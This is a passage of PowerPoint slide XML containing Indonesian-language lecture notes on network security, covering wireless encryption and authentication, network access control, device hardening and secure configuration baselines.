              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nirkabel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> WPA3), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>metode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>autentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> RADIUS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> mode </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>), dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memantau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>titik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nakal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (NAC) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>solusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberlakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ingin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengakses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Solusi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengkategorikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aktivitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mematuhi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebelum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memantaunya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhubung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Konsep-konsep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membentuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pendekatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berlapis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melindungi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> TI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Tujuan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Pembelajaran</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Dalam </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelajaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berikut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Menjelaskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pentingnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> garis </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dasar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Menjelajahi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konsep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengerasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Merangkum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pertimbangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>desain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nirkabel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Menjelaskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengaturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nirkabel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Memahami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemampuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (NAC).</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197</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="249495814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Garis </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dasar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjelaskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangkaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> minimum </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Garis </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dasar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencakup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> area </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> firewall, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengaturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> router dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sakelar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>titik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nirkabel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>protokol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Garis </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dasar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>titik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>awal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
